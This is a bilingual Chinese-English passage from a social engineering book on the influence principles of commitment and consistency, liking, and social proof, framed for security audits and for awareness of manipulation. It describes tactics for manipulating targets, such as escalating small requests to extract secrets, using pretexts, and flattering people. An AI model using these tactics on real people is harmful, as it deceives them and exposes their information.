  • 拍卖: eBay 等在线拍卖行的日益普及使这一原则更加明显。人们对他们出价的东西有一定程度的承诺,如果有人出价高于他们,他们就会被迫再次出价。有时他们甚至会因为感到承诺而将出价提高到远远超出他们的舒适区。一个典型的例子是罗伯特·坎波 (Robert Campeau) 收购布鲁明戴尔百货公司 (Bloomingdales)。他支付的价格比其价值高出6 亿美元。 《理性谈判》一书的作者马克斯·巴泽曼 (Max Bazerman) 引用了《华尔街日报》的一位记者的话:“我们不再与价格打交道,而是与自负打交道……”
  • Auctions: The increased popularity of online auction houses such as eBay has this principle more visible. People feel a level of commitment to something they place a bid on and if someone outbids them it is as if they are compelled to bid again. At times they will even increase the bid way past their comfort zone because they feel committed. One classic example of this is when Robert Campeau bought Bloomingdales. He paid $600 million dollars more than it was worth. Max Bazerman, author of Negotiating Rationally quoted a journalist from the Wall Street Journal as saying, “We are not dealing with price anymore, but with egos….”
  •  
     
  • 嘉年华、游戏屋等:只要涉及赌博或游戏屋,就存在着更大的风险,即利用承诺和一致性来说服人们。专栏作家 Ryan Healy 是一名在线营销顾问,他写了一篇关于他带女儿去看马戏团的故事( www.ryanhealy.com/commitment-and-consistency/)。他花了 44 美元买票,5 美元停车,然后开车 40 分钟到达那里。他承诺要去看马戏团。他的女儿想要棉花糖,所以他给了她 5 美元,以示同意。棉花糖怎么会更贵呢?当卖主过来告诉我一袋棉花糖要 12 美元时,他怎么能现在就违背承诺呢?他不能,所以最后只花了 12 美元买了一颗棉花糖。
  • Carnivals, game houses, and so on: Anytime gambling or game houses are involved a greater risk exists of commitment and consistency being used to persuade people. One columnist, Ryan Healy, an online marketing consultant, wrote a story about when he took his daughter to a circus (www.ryanhealy.com/commitment-and-consistency/). He spent $44 on the tickets, $5 to park his car, then 40 minutes of drive time to get there. He was committed to being at the circus. His daughter wanted cotton candy so he committed to a yes by giving her $5. How could cotton candy cost more than that? When the vendor came by and said the bag was $12, how could he back out on his commitment now? He couldn’t, and therefore ended up spending the $12 on a single cotton candy.
  •  
 

这种伪装的一致性被定义为基于之前的经验或期望所期望的结果。这种经验或期望可以激励目标采取可能导致违规的行动。例如,当技术支持人员到来时,预计他会去服务器机房。该请求与之前的经验和期望一致。当请求访问服务器机房时,它更有可能被满足,因为它与预期一致。

Consistency in this pretense is defined as what is expected based on previous experience or expectations. That experience or expectation can motivate a target to take an action that can cause a breach. For example, when the tech support guy comes it is expected he will go to the server room. That request is consistent with the previous experience and expectation. When access to the server room is requested, it is more likely to be fulfilled because it is consistent with what is expected.

 

承诺和一致性可以成为影响大多数人采取行动、提供信息或泄露秘密的重要因素。

Commitment and consistency can be strong influence factors upon most people to take actions, give information, or divulge secrets.

 

社会工程师可以将承诺和一致性作为其武器库中最强大的工具。如果社会工程师可以让目标承诺一件小事,那么通常升级承诺并不难。

A social engineer can make commitment and consistency some of the most powerful tools in his or her arsenal. If a social engineer can get a target to commit to something small, usually escalating the commitment is not too hard.

 

罗伯特·西奥迪尼在他的著作《影响力》中写道:

In his book Influence, Robert Cialdini writes:

 

使用承诺和一致性原则操纵他人的关键在于最初的承诺。也就是说,在做出承诺、表明立场或立场之后,人们更愿意同意与他们先前的承诺一致的要求。许多合规专业人士会试图诱导他人采取与他们稍后要求的行为一致的初始立场。

The key to using the principles of Commitment and Consistency to manipulate people is held within the initial commitment. That is—after making a commitment, taking a stand or position, people are more willing to agree to requests that are consistent with their prior commitment. Many compliance professionals will try to induce others to take an initial position that is consistent with a behavior they will later request.

 

希望采用承诺和一致性技术的社会工程师通常会试图让目标泄露一小部分信息以实现总体预期目标。通过让目标始终如一地坚持自己已经说过的话,攻击者可能会让目标透露更多信息。

The social engineer hoping to employ the technique of commitment and consistency usually tries to get the target to divulge a small piece of information toward the overall intended goal. By getting the subject to remain consistent with things he or she has already said, the attacker may get the subject to reveal even more information.

 

另一方面,攻击者必须始终坚持自己的要求。攻击者应该从小处着手,逐步扩大信息收集范围。

On the other hand, the attacker must remain consistent with what he is asking. The attacker should start off small and escalate the information gathering.

 

举一个不切实际的例子,攻击者永远不应该一开始就要求提供核发射密码。这个请求会被拒绝,攻击者除了撤回请求外别无选择。然而,从小处着手,随着收集到的每一条新信息不断增加所要求信息的价值,这看起来是一个更自然的进展,对受害者来说也不会那么明显。

To use an unrealistic example, an attacker should never start off asking for the nuclear launch codes. This request will be denied, and the attacker will be left few options but to backpedal the request. However, starting off small and escalating the value of the information requested with each new piece of gathered information will seem like a more natural progression and will not appear so obvious to the victim.

 

缓慢而循序渐进地进行可能会很困难,因为社交工程师通常没有耐心,想要立即获得“密码”。保持冷静和耐心可以让这条路变得有回报。明确定义,甚至写出每次审计可以使用的路径,可以帮助您在审计时有明确的目标和实现目标的路径。

Going slowly and progressively can be hard as social engineers are often impatient and want to get the “password” right now. Playing it cool and remaining patient can make this avenue rewarding. Clearly defining, maybe even writing out, a path that you can use on each audit can help you go into the audit with clearly defined goals and a path to accomplish them.

 

我创建了一个图表(如图 6-2所示),该图表展示了社会工程师如何能够形象化地利用承诺和一致性来获取信息。

I created a chart you can see in Figure 6-2 that shows how a social engineer may be able to visualize this path to obtain information using commitment and consistency.

 

让目标口头承诺采取某种行动可以迫使目标采取某种行动。西奥迪尼表示,“承诺和一致性规则规定,一旦我们做出决定,我们就会受到来自他人和自身的压力,要求我们始终坚持这一决定。根据你过去的行为,你可能会被迫做出好的或坏的决定。”

Getting a target to verbally commit to a certain action can force the target into a certain path of action. Cialdini states, “The commitment and consistency rule states that once we make a decision, we will experience pressure from others and ourselves to behave consistently with that decision. You can be pressured into making either good or bad decisions depending on your past actions.”

 

如果你曾口头告诉过你的妻子或配偶你想减肥,那么你也许有过这种感觉。这种口头“承诺”会给你带来很大的压力,迫使你履行“承诺”。

Maybe you have felt this if you ever verbally told your wife or spouse that you wanted to lose weight. That verbal “commitment” leads to a lot of pressure to hold up to your end of the “bargain.”

 

有时,最终与自己意见相左可能很困难,几乎不可能。每个人一生中至少都会在某个时刻嘟囔一次“对不起,我改变主意了”。当我们这样做时,我们会羞愧地低下头,语调低沉,听起来很悲伤。为什么?我们刚刚违背了自己做出的承诺,并为此感到内疚。

Sometimes, ending up disagreeing with yourself can be hard and almost impossible. Everyone has, at one point or another muttered the phrase, “I’m sorry, I changed my mind,” at least once in our lives. When we do, we hang our head in shame, our voice tones drop, and we sound sad. Why? We have just broken a commitment we made and we feel guilty for doing it.

 

图 6-2:明确定义您的目标可以帮助您获得信息承诺。

Figure 6-2: Clearly defining your goals can help you to obtain an information commitment.

 
f0602.eps
 

即使是看似微不足道的承诺也可能导致剥削。例如,律师经常使用的电话对话是这样的:

Even small, seemingly insignificant commitments can lead to exploitation. For example, a phone conversation often used by solicitors goes something like this:

 

“你好,今天感觉怎样?”

“Hello, how are you today?”

 

你回答说:“我很好。”

You answer, “I am doing great.”

 

现在,准备好行动吧:“听到这个消息真是太好了,因为一些境况不太好的人需要你的帮助。”

Now, prepare for the exploit: “That is good to hear, because some people who are not doing so great can use your help.”

 

你现在不能收回你说过的话,因为你仍然做得很好并且致力于此。

You can’t go back on what you said now, because you are still doing great and committed to it.

 

这并不是说你需要如此偏执,以至于你甚至不能毫无顾忌地回答简单的问题,但要意识到一次承诺并不意味着你必须承诺接下来的一切,这一点至关重要。我曾经和一个家伙共事过,他可以让任何人做最糟糕的工作,并让他们认为这是他们的主意。确保他们的承诺是他使用的一种方法。

This is not to say that you need to be so paranoid that you cannot even answer simple questions without the fear of exploitation, but being aware that one commitment does not mean you must commit to everything that follows is vital. I once worked with a guy who could literally get anyone to do the worst jobs and make them think it was their idea. Ensuring their commitment was one method he used.

 

如果你决定在某些事情上同意他的意见,这几乎是不可能不做的,因为他让你提前说“是”,那么你就必须继续说“是”。这些“是”会引导你走上一条道路,这条道路正是他想要的,同意他需要完成的工作。

If you committed to a path of agreeing with him on certain things, which was almost impossible not to do, because he got you to say “yes” upfront, then you had to continue to say “yes.” Those yeses lead down one path, and that path was right to where he wanted, agreeing to the job he needed to get done.

 

意识到说“不”是可以的,可以让你避免做出可能带来灾难的事情。但有时我们会说服自己说“不”是一种大罪,需要多次祈祷才能得到宽恕。

Being aware that it is okay to say “no” can save you from committing to something that could be disastrous. Yet sometimes we convince ourselves that saying “no” is some form of cardinal sin that needs many prayers to be forgiven.

 

在前面那个冷冻肉销售员的例子中,我的妻子是一个非常有自知之明的人。她知道自己可能会被“看似划算的交易”所操纵,所以她进来找我,因为我是个“混蛋”。

In the earlier example of the frozen meat salesman, my wife is a very self-aware person. Knowing she might be manipulated by a “seemingly good deal” she came inside to get me because I am a “jerk.”

 

我听过的一个真正体现承诺力量的最好例子是托马斯·莫里亚蒂博士于 1972 年进行的一项社会实验。他派一名助手带着便携式收音机到海滩当“受害者”。受害者坐在椅子上听了大约 10 分钟的收音机,然后起身去买饮料。

One of the best examples I have heard that really shows the power of commitment is a social experiment done by Dr. Thomas Moriarty in 1972. He sent an assistant to the beach as a “victim” with a portable radio. The victim sat in his chair listening to his radio for about 10 minutes, then he got up to go purchase a drink.

 

当他离开时,另一名助手,也就是没人知道与他合作的“罪犯”,过来“偷”收音机。20 个人中只有 4 人(即只有 20%)阻止了小偷拿走收音机。

While he was gone, another assistant, the “criminal” who no one knew was working with him, came by to “steal” the radio. Only 4 out of 20 people—that’s only 20%—stopped the thief from taking the radio.

 

研究人员在下一轮中提高了赌注。在“受害者”离开去买饮料之前,他会请一位邻近的日光浴者帮他看收音机。你认为变化是什么?

The researchers then upped the ante in the next round. Before the “victim” would leave to buy the drink he would ask one of the neighboring sunbathers to watch his radio for him. What do you think the change was?

 

现在,20 人中竟然有 19 人阻止了小偷,有些人甚至诉诸暴力。为什么会有如此惊人的差异?承诺和一致性。研究人员从附近的日光浴者那里获得了承诺,这导致他们必须始终如一地履行承诺。在我看来,这些惊人的统计数据显示了这种影响方法的威力。

Now a staggering 19 out of 20 stopped the thief, some even resorting to violence. Why the staggering difference? Commitment and consistency. The researcher obtained commitment from the neighboring sunbathers and that caused them to have to act consistently with that commitment. In my opinion, these are amazing statistics that show the power of this influence method.

 

社会工程师可以有效地利用这种影响方法,让目标承诺哪怕是一个小行为或小小的“是”,并利用这种承诺将其升级为更大规模的行动。

A social engineer can effectively use this method of influence to get a target to commit to even a small act or small “yes” and use that commitment to escalate it into a larger set of actions.

 

喜欢

Liking

 

人们喜欢喜欢他们的人。这句话虽然绕口,但却是一句非常正确的话。理解这句话的深度会让你更接近掌握说服术。

People like people who like them. As tongue twisting as that phrase is, it is a very true statement. Understanding the full depth of that statement gets you much closer to mastering persuasion.

 

当我说理解深度时,我的意思实际上是因为这句话所包含的内容比表面上看到的要多得多。

When I say understand the depth, I really mean that because that sentence has much more to it than meets the eye.

 

这句话并不是说喜欢你的人会做出很好的回应。销售人员经常被教导说,人们会从他们喜欢的人那里买东西。这是真的,但不是重点。这句话也不是说人们必须喜欢你——而是你必须喜欢别人,然后他们才会喜欢你。

This statement isn’t saying that people who like you will respond well. Salespeople are often taught that people buy from people they like. That is true, but not the point. It also isn’t saying that people must like you—it is saying you must like people and then they will like you in return.

 

这项任务并不像听起来那么容易,因为喜欢一个人是无法伪装的。正如第 5 章所讨论的,微笑和幸福很难伪装。你必须真正地关心你试图影响的人。关心他人及其感受并不是恶意社会工程师的标准做法;因此,他们经常依靠魅力。魅力可以在短期内发挥作用,但从长远来看,喜欢一个人是一项经过实践和学习的技能。

This task is not as easy as it sounds because liking someone cannot be faked. As discussed in Chapter 5, smiles and happiness are very hard to fake. You must go into the circumstance genuinely caring for the person who you are trying to influence. Caring for people and their feelings is not a standard practice of the malicious social engineer; therefore, they often rely on charm. Charm can work on a short-term basis, but in the long term, liking people is a practiced and learned skill.

 

喜好在营销中被广泛使用。1990 年,乔纳森·弗伦岑 (Jonathan Frenzen) 和哈里·戴维斯 (Harry Davis) 发表了一项名为“嵌入式市场中的购买行为”的研究 ( www.jstor.org/pss/2626820 ),研究了特百惠派对为何如此成功。他们所有的研究都指向了这一喜好原则。

Liking is used in marketing extensively. In 1990 Jonathan Frenzen and Harry Davis published a study entitled, “Purchasing Behavior in Embedded Markets” (www.jstor.org/pss/2626820) that examined why Tupperware parties are so successful. All of their research led to this principle of liking.

 

研究人员得出结论,大多数人买东西是因为他们希望女主人开心、帮助朋友并被人喜欢。参加这样的聚会却什么都不买,真是太尴尬了!害怕不被人喜欢是大多数人在这些聚会上购买东西的原因,这与想要更多特百惠产品几乎没有关系。

The researchers concluded that most people bought because they wanted the hostess to be happy, to help a friend, and to be liked. How embarrassing to go to a party like this and not buy anything! That fear of not being liked is what will drive most people to purchase at these parties and it has little to do with wanting more Tupperware.

 

其他调查和研究将人们对从朋友那里得到的“提示或建议”的信任度与对完全陌生的人或更糟的人(他们不喜欢的人)的信任度进行了比较。朋友可能会给出不好的建议,而人们可能更倾向于听从不喜欢的人给出的好建议。

Other surveys and studies have compared the trust that people have in receiving “tips or advice” from those they consider friends to the trust they have in complete strangers or worse, people they don’t like. A friend can give bad advice and one may be more prone to follow it than good advice from a person one doesn’t like.

 

从社会工程学的角度来看,喜欢的概念是一个强大的工具。你不仅要讨人喜欢并赢得他们的信任,还必须真正对人感兴趣。这个概念可以追溯到第 4 章中关于借口的讨论。当你借口时,你不仅仅是在表现出一种想法或信念——你必须成为你借口的人;这个角色就是你的生活。如果你能做到这一点,那么喜欢这一步就会变得更容易。你的借口是真正想要帮助、喜欢或协助那个人。

From a social engineering aspect the concept of liking is a powerful tool. Not only do you have to be likeable and win their trust, but you also have to genuinely be interested in people. This concept goes back to the discussion of pretexting in Chapter 4. When you pretext, you are not merely acting out an idea or belief—you must become the person you are pretexting; that role is what your life is about. If you can do that then the step of liking can become easier. Your pretext will be truly interested in helping, liking, or assisting that person.

 

对你作为社交工程师来说,喜欢的最后一个重要方面是外表吸引力。人类倾向于自动“喜欢”那些我们认为有吸引力的人。这听起来很虚荣,但这是事实。一些严肃的心理学原理支持这一想法。

One last aspect of liking that is important for you as a social engineer is physical attractiveness. Humans tend to automatically “like” those who we find attractive. As vain as that sounds, it is the truth. Some serious psychological principles back up this idea.

 

美即善。1972 年,Berscheid、Walster 和 Dion 进行了一项名为“美即善”的研究,该研究得出了一些非常深刻的发现。参与者被要求对三个人的照片进行评分,从低、中、高吸引力三个方面进行评分。仅根据照片,他们就对人物的性格特征、总体幸福感和职业成功进行评分。

What is beautiful is good. In 1972 Berscheid, Walster, and Dion performed a study entitled just that, “What Is Beautiful Is Good,” which unleashed some very profound findings. Participants were asked to rate photos of three individuals ranging from low, medium, and high attractiveness. Based on the photos alone they were to rate the people for personality traits, overall happiness, and career success.

 

然后,他们汇总了评分并计算平均值,发现被认为有吸引力的人更受社会欢迎,有更好的职业,更快乐,更成功。这项研究证明,人们倾向于将美貌与其他成功品质联系起来,这会改变他们的看法和信任他人的能力。

They then compiled the ratings and averaged them and found that people who were deemed attractive were more socially desirable, had better occupations, were happier, and more successful. The study proved that people tend to link beauty with other successful qualities and it alters their opinions and ability to trust someone.

 

这项研究是光环效应的一个例子,光环效应是指一个人的某种特质会影响或延伸到其他品质。事实证明,光环效应会使一个人的决策产生偏差,倾向于关注他人的优点。我已将这项惊人研究的副本存档在www.social-engineer.org/wiki/archives/BlogPosts/BeautifulGood.pdf

This study is an example of a phenomenon called the halo effect, where one particular trait influences or extends to the other qualities of the person. It has been proven to bias a person’s decisions with a tendency to focus on the good traits of the other person. I have archived a copy of this amazing study at www.social-engineer.org/wiki/archives/BlogPosts/BeautifulGood.pdf.

 

换句话说,如果有人认为你很美,那么这种优点就会延伸到这个人对你的其他评价。这种光环效应经常用于营销。漂亮的人会得到喝、吃、穿的产品,其他人会自动认为这些东西很好,可能会想,“既然这个漂亮的人用它,那它一定很好。”

In other words, if someone views you as beautiful, then that good trait extends to other judgments that person makes about you. This halo effect is often used in marketing. Beautiful people are given products to drink, eat, and wear, and other people will automatically assume these things are good, possibly thinking, “Well it must be good if this beautiful person is using it.”

 

最近我在电视上看到一则广告,它确实触动了我——广告嘲讽营销手段,但做得非常聪明。一位身着漂亮衣服的漂亮年轻女性出现在屏幕上,说道:“嗨,我是一个 18-24 岁、魅力十足的女性。”

Recently I saw an ad on television that really hit this point home—the ad makes fun of marketing efforts but does it very intelligently. An attractive young female comes on the screen wearing beautiful clothing and says, “Hi, I am a believably attractive 18–24 year old female.”

 

用一个不是特别有魅力,但又真实可信的女性来做广告,我们普通人可以仰望她,她就是营销天才。我们无法判断她的年龄,但从她的美貌来看,她的年龄在 18-24 岁之间。

Using an attractive female who is not overly attractive, but believably real, someone we normal people can look up to is marketing genius. We can’t really tell her age but her beauty can place her somewhere between the ages of 18–24.

 

“你可以理解我,因为我的种族身份模糊。”

“You can relate to me because I am racially ambiguous.”

 

再次强调,这是另一个营销天才的秘诀。她不是黑人、白人或美洲原住民——我们无法分辨,但她可能是混血儿,这可能对许多种族都有吸引力,而且对大多数人来说并不冒犯。

Again, this is another marketing genius tip. She is not black, white, or Native American—we can’t tell, but she may be a mix, which may be attractive to many races and is non-offensive to most.

 

“我出演这则广告是因为市场调查显示,像你这样的女孩喜欢像我这样的女孩。”

“I am in this commercial because market research shows girls like you love girls like me.”

 

她的美丽和自信让我们喜欢她;她衣着得体,谈吐优雅,我们想认识她。

Her beauty and self-assuredness makes us like her; she is well dressed, well spoken, and we want to know her.

 

然后镜头摇到她做各种事情的不同镜头,比如跆拳道、啦啦队和玩花。通过向观众展示她可以做所有这些事情,同时又如此美丽,我们认为她很强大,她所做的一切都很好。

The camera then pans to different shots of her doing things like kickboxing, cheerleading, and playing with flowers. By showing viewers she can do all these things while being as beautiful as she is, we perceive her as strong and powerful, and all the things she’s doing as good.

 

“现在我要告诉你去买一样东西……”

“Now I am going to tell you to buy something…”

 

然后她继续推销卫生棉条。这则广告非常有创意,因为广告商实际上概述、使用并教育了消费者让你想购买的方法。但尽管如此,这则广告中还是存在着这种喜欢的原则和光环效应。

She then goes on to sell tampons. This commercial is genius, because the advertiser actually outlines, uses, and educates the consumer on the methods used to make you want to buy. But despite all that, within this commercial lies this principle of liking and the halo effect.

 

了解了这些关于喜欢的重要性之后,你能做什么呢?我很难成为一个有吸引力的男性,更不用说成为一个有吸引力的女性了。因为我无法无休止地跑去当地的整形外科医生,社会工程师能做些什么来利用这个原则吗?

Knowing all this about the importance of liking, what can you do? I have a hard enough time becoming an attractive male, let alone an attractive female. Because endless runs to my local plastic surgeon are out, is there anything a social engineer can do to capitalize on this principle?

 

了解你的目标。了解他或她能接受什么,不能接受什么。他如何着装,他认为什么是好的,什么是坏的?过多的珠宝、化妆品或其他着装方面可能会让目标失去兴趣。假设你正在审计一家诊所,而你的借口是药品销售代表。你知道大多数销售代表都穿着西装,头发梳得一丝不苟,而且看起来、闻起来和举止都很自信,这是许多有魅力的人的特质,所以如果你留着尖尖的头发,脸上有穿孔,那么你会比你的目标更引人注目。

Know your target. Know what is and isn’t acceptable to him or her. How does he dress, and what does he consider bad and good? Too much jewelry, makeup, or other aspect of dress can turn off a target. Suppose you are auditing a doctor’s office and your pretext is a drug sales representative. You know that most sales reps wear suits; have perfect hair; and look, smell, and act confident, a trait of many attractive people, so walking in with spiked hair and facial piercings would draw more attention to yourself than your goal.

 

您必须了解您的目标,这样您才能成功地打扮成目标所期望的样子。穿着不会让目标感到震惊、惊讶或厌恶的衣服、发型、珠宝和化妆品。让她放心可以大大有助于营造一种让她喜欢您的氛围,从而建立信任并取得成功。

You must know your target so you can successfully look the way the target would expect. Wear clothing, hairstyles, jewelry, and makeup that will not shock, surprise, or disgust the target. Putting her mind at ease can go a long way toward creating an atmosphere where she will like you, which will build trust and lead to success.

 

社会工程师可以寻找可以赞美目标的事物。在与目标互动时,如果合适,用一个简单的赞美问题(例如“这些鞋子真漂亮;你在哪里买的?”)开始对话很有用。人们喜欢积极的鼓励。当一个人收到另一个人的称赞时,他往往会继续互动,以便获得更多的积极鼓励。这些赞美往往会强化目标的自我形象,让他觉得你对他的了解超出了正常水平。

A social engineer can look for things to compliment a target on. When engaging a target, and when appropriate, starting the conversation with a simple complimentary question (such as “Those are nice shoes; where did you buy them?”) is useful. People like positive reinforcement. When one receives compliments from another, he tends to stay engaged in order to receive more positive reinforcement. These compliments tend to reinforce a target’s self image, making him feel as if you have a greater-than-normal understanding of him.

 

明尼苏达大学发表了一篇关于强化的论文 ( www.cehd.umn.edu/ceed/publications/tipsheets/preschoolbehaviortipsheets/posrein.pdf ),其中指出过多的积极强化会产生负面影响。他们称之为饱食,这意味着当强化过多时,它开始失去效力。为了对抗这种影响,您可以使用积极强化并提出问题。这种方法不仅能强化积极的行为或态度,还能让人们在被问到自己时感到高兴。

The University of Minnesota issued a paper (www.cehd.umn.edu/ceed/publications/tipsheets/preschoolbehaviortipsheets/posrein.pdf) about reinforcement which states that too much positive reinforcement can have a negative effect. They call it satiation, which means that when reinforcement is given too much it begins to lose its effectiveness. To combat this effect, you can use positive reinforcement backed up by a question. This method reinforces positive behavior or attitudes but also makes people happy as they are asked about themselves.

 

四个步骤可以帮助你让人们喜欢你:

Four steps can help you get people to like you:

 

1.展现自信、积极的态度。

2.建立融洽关系。

3.使用前面提到的方法与目标和周围环境同步或协调。

4.有效沟通。

1. Project a confident and positive attitude.

2. Establish rapport.

3. Synchronize, or get in tune with the target and surroundings using the methods mentioned earlier.

4. Effectively communicate.

 

尼古拉斯·布思曼在他的著作《如何在 90 秒内让别人喜欢你》中说,人们在与某人见面的头两秒内就会决定是否喜欢他。一旦留下了印象,改变就很难了。他提倡以良好的态度进行互动。在许多不同情况下,能够畅所欲言并有效沟通可以让你更受人喜欢。你投射给别人的就是他们会感受到的。你的面部表情、肢体语言、着装等都必须投射出一种良好、积极的态度。

In his book How to Make People Like You in 90 Seconds, Nicholas Boothman says that people decide whether they like someone in the first two seconds of meeting him or her. After an impression is made changing it can be hard. He promotes coming into an interaction with a good attitude. Having the ability to speak up and communicate effectively in many different situations can make you more likeable. What you project onto others is what they will feel. Your facial expressions, body language, dress, and so on must all project a good, positive attitude.

 

布思曼在他的书中谈到了如何讨人喜欢的一些关键点,包括多问问题、积极倾听以及对人们所说的内容感兴趣。做这些事情会让人们喜欢你。

Boothman says some key things in his book about being likeable, including to ask lots of questions, actively listen, and be interested in what people are saying. Doing these things will help people like you.

 

社会工程师可能需要练习,但讨人喜欢对于审计的成功至关重要。

A social engineer may need to practice it, but being likeable will go a long way toward succeeding in your audits.

 

共识或社会认同

Consensus or Social Proof

 

社会认同是一种心理现象,发生在人们无法确定适当行为模式的社交场合。如果你看到别人以某种方式行事或说话,你很容易认为某种行为是适当的。一般来说,社会影响会导致大批人做出正确或错误的选择。当人们进入不熟悉的情况,并且没有如何处理这种情况的参考框架时,这种行为很常见;他们会模仿那些他们认为更熟悉、因此更了解情况的人的行为。

Social proof is a psychological phenomenon that occurs in social situations when people are unable to determine the appropriate mode of behavior. You can easily assume a behavior is appropriate if you see others acting or talking a certain way. Social influence in general can lead to conformity of large groups of individuals in either correct or mistaken choices. This behavior is common when people enter into unfamiliar situations and don’t have a frame of reference on how to deal with the situation; they mirror their behavior off of others whom they assume are more familiar and therefore better informed.

 

罗伯特·西奥迪尼博士在其著作《影响力:说服心理学》中指出:“社会认同——人们会做他们看到其他人正在做的事情。例如,在一项实验中,一个或多个同伙会抬头仰望天空;旁观者也会抬头仰望天空,看看他们看到了什么。这项实验一度中止,因为抬头仰望的人太多,导致交通堵塞。”

In his book, Influence: The Psychology of Persuasion, Dr. Robert Cialdini states, “Social proof—people will do things that they see other people are doing. For example, in one experiment, one or more confederates would look up into the sky; bystanders would then look up into the sky to see what they were seeing. At one point this experiment is aborted, as so many people were looking up that they stopped traffic.”

 

我将概述一些社会认同的优秀例子,以帮助您了解它有多么强大,以及您是否曾经被它所左右。

I will outline some excellent examples of social proof that will help you to see how powerful it is and if you have ever fallen for it.

 

社会认同在营销中被广泛使用。社会认同在销售中被广泛使用,比如发布高销量数据,向潜在客户展示产品受欢迎。另一个例子是,公司发布印有徽标或口号的衬衫,穿着者会给予暗示性认可。

Social proof is used heavily in marketing. Social proof is utilized in sales when high sales numbers are released, demonstrating to potential customers that the product is popular. Another example is when companies release shirts with logos or slogans printed on them, where the wearer then gives an implicit endorsement.

 

社会认同不仅受大群体的影响,也受知名人士的影响。例如,一位名人与产品产生联系,会让其他人也想与这位名人的积极特质产生联系,然后他们就会使用同样的产品。

Social proof is not just influenced by large groups, but also by high-profile individuals. For instance, a single celebrity becoming associated with product will make others want to be associated with the celebrity’s positive traits, and they will then use the same product.

 

名人代言的例子有很多,这里仅列举几个:

Many examples exist of celebrity endorsements, here are a just a few:

 
 
     
  • 一家主要的贝雷帽供应商成功邀请塞缪尔·杰克逊 (Samuel L. Jackson) 为其产品 Kangol 帽子代言。
  • A major supplier of berets was able to get Samuel L. Jackson to endorse their product, The Kangol hat.
  •  
     
  • 截至 2010 年,玛利亚·莎拉波娃每年因代言佳能产品而获得数百万美元报酬。
  • Right through 2010 Maria Sharapova was paid millions in USD per year to endorse Canon products.
  •  
     
  • 凯瑟琳·泽塔·琼斯在 T-Mobile 产品的电视广告和平面广告中代言价值高达 2000 万美元。
  • Catherine Zeta Jones endorses T-Mobile Products in their TV commercials and print ads to the tune of $20 million in USD.
  •  
     
  • 2009 年,泰格·伍兹因其场外产品代言而获得了超过 1 亿美元的报酬,这些产品包括 AT&T、佳得乐、吉列、耐克高尔夫和豪雅表等。
  • In 2009, Tiger Woods was paid over $100 million in USD for his off-course product endorsements like AT&T, Gatorade, Gillette, Nike Golf and TAG HEUER to name a few.
  •  
     
  • 迈克尔·乔丹每年仍能通过耐克代言赚取 4500 万美元。
  • Michael Jordan still earns $45 million in USD per year for his Nike endorsements.
  •  
 

甚至还有一些更不寻常的名人代言,例如:

There are even some more unusual celebrity endorsements like:

 
 
     
  • 奥兹·奥斯本代言《我不敢相信这不是黄油》
  • Ozzy Osbourne endorsing I Can't Believe It's Not Butter
  •  
     
  • 米哈伊尔·戈尔巴乔夫代言路易·威登
  • Mikhail Gorbachev endorsing Louis Vuitton
  •  
     
  • 本·斯蒂勒向日本观众代言酒精饮料 Chu High
  • Ben Stiller endorsing the alcoholic drink Chu High to Japanese Viewers
  •  
 

为什么公司要花这么多钱请明星代言他们的产品?这正是社会认同的原理。当消费者看到他们崇拜和喜爱的名人穿着、使用甚至谈论这些产品时,就好像是那些名人直接告诉他们这些产品有多棒。许多人会将其视为这些产品物有所值的有力证据。

Why do companies spend so much just to have a celebrity endorse their products? It is exactly how social proof works. When consumers see famous people they admire and adore wearing, using or even speaking about those products, it is as if they are being told directly by that person how amazing that product is. Many will view it as solid proof that these products are worth every penny.

 

该公司在营销活动中表示,他们的帽子是市场上最热门的帽子之一,证据就是杰克逊先生经常戴着这些帽子。

In its marketing efforts the company said its hats were some of the hottest on the market and the proof was that Mr. Jackson can be seen wearing them.

 

广告商经常会说“销量最大”或“最热门的产品”之类的话,以让受众相信他们的这些说法得到了许多同行的支持。

Advertisers often say things like, “largest selling” or “hottest product” to convince their audience that they have the backing of many of our peers in these claims.

 

此外,Media-Studies.ca 网站发布了一篇关于利用社会认同影响目标的文章(www.media-studies.ca/articles/influence_ch4.htm):

In addition, the Media-Studies.ca website posted an article on influencing its targets using social proof (www.media-studies.ca/articles/influence_ch4.htm):

 

实验发现,使用录音笑声可以让观众在听到幽默内容时笑得更久、更频繁,并认为内容更有趣。此外,一些证据表明,录音笑声对糟糕的笑话最有效。”问题是:为什么它有效,尤其是当笑声通常如此明显是假的时候?为了回答这个问题,西奥迪尼提出了社会认同原则:“我们用来确定什么是正确的方法之一是找出其他人认为正确的……我们认为在特定情况下,一种行为更正确,取决于我们看到其他人做这种行为的程度。”

Experiments have found that the use of canned laughter causes an audience to laugh longer and more often when humorous material is presented and to rate the material as funnier. In addition, some evidence indicates that canned laughter is most effective for poor jokes.” The question is: why does it work, especially when the laugh track is often so obviously fake? To answer this question, Cialdini posits the principle of social proof: “One means we use to determine what is correct is to find out what other people think is correct…We view a behavior as more correct in a given situation to the degree that we see others performing it.”

 

与其他“影响力武器”一样,社会认同是一条捷径,通常对我们很有效:如果我们顺应周围看到的行为,我们就不太可能犯社交失礼。罐装笑声会引发观众的自动反应,这一事实表明,听觉提示是一种强大的刺激,因为它们在难以批评的意识层面上影响着我们。

As with the other “weapons of influence,” social proof is a shortcut that usually works well for us: if we conform to the behavior we see around us, we are less likely to make a social faux pas. The fact that canned laughter provokes an automatic response in audiences suggests that auditory cues are powerful stimuli because they influence us at a level of consciousness that is difficult to critique.

 

其他例子包括调酒师或其他机构如何“往小费罐里放盐”,即往罐子里放几张钞票。当顾客过来买食物时,暗示是“之前很多人都给过我小费,你为什么不给呢?”而且这招很管用!

Other examples are how bartenders or other establishments will “salt the tip jar,” by placing a few bills in the jar. As a patron approaches to purchase food the implication is, “Many before you have tipped me, why don’t you?” And it works, too!

 

该领域最深刻、最引人注目的研究之一是由 KD Craig 博士于 1978 年完成的。Craig 博士毕生致力于研究疼痛及其对人的影响。1978 年,他发表了一篇题为“社会建模对感觉决策理论和疼痛心理生理指数的影响”的论文(www.ncbi.nlm.nih.gov/pubmed/690805?dopt=Abstract),其中他进行了一项实验,他将其描述为:

One of the most profound bits of research in this field that really stands out was done by Dr. K. D. Craig in 1978. Dr. Craig devoted his life to the study of pain and its effect on people. In 1978 he published a paper entitled “Social Modeling Influences on Sensory Decision Theory and Psychophysiological Indexes of Pain” (www.ncbi.nlm.nih.gov/pubmed/690805?dopt=Abstract), in which he did an experiment that he described as:

 

暴露于伪装容忍或不容忍的社会模型的受试者通常会在对疼痛刺激的言语评价中表现出匹配的行为。然而,目前尚不清楚这些变化是反映了自愿改变证据还是痛苦的真正变化。

